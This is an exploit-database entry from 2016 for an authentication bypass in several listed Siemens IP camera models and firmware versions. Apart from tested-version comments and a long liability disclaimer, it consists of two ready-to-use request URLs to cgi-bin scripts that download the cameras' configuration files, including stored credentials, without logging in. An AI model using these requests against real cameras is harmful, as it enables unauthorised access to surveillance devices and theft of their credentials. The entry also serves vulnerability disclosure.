SIEMENS IP Cameras (Multiple Models) - Credential Disclosure / Configuration Download

2016-08-19T00:00:00
ID 1337DAY-ID-25275
Type zdt
Reporter Todor Donev
Modified 2016-08-19T00:00:00

Description

Exploit for cgi platform in category web applications

                                        
                                            # 
#
#  Multiple SIEMENS IP Cameras auth bypass configuration download
#
#  Tested: 
#  SIEMENS IP Camera CCID1410-ST X.1.0.24
#  SIEMENS IP Camera CCMW1025 x.2.2.1798
#  SIEMENS IP Camera CCMS2025 x.2.2.1798
#  SIEMENS IP Camera CVMS2025-IR x.2.2.1798
#  SIEMENS IP Camera CVMS2025-IR CxMS2025_V2458
#  SIEMENS IP Camera CVMS2025-IR CxMS2025_V2458_SP1
#  SIEMENS IP Camera CCPW5025-IR CCPWx025_V0.1.58
#  
#  ...and more, more devices who use same firmware
#
#  Copyright 2016 (c) Todor Donev <todor.donev at gmail.com>
#  http://www.ethical-hacker.org/
#  https://www.facebook.com/ethicalhackerorg
#  
#  Disclaimer:
#  This or previous programs is for Educational
#  purpose ONLY. Do not use it without permission.
#  The usual disclaimer applies, especially the
#  fact that Todor Donev is not liable for any
#  damages caused by direct or indirect use of the
#  information or functionality provided by these
#  programs. The author or any Internet provider
#  bears NO responsibility for content or misuse
#  of these programs or any derivatives thereof.
#  By using these programs you accept the fact
#  that any damage (dataloss, system crash,
#  system compromise, etc.) caused by the use
#  of these programs is not Todor Donev's
#  responsibility.
#  
#  Use them at your own risk!
#
#  
  
http://TARGET/cgi-bin/chklogin.cgi?file=config.ini
http://TARGET/cgi-bin/check.cgi?file=ikwd03conf.ini

#  0day.today [2018-03-14]  #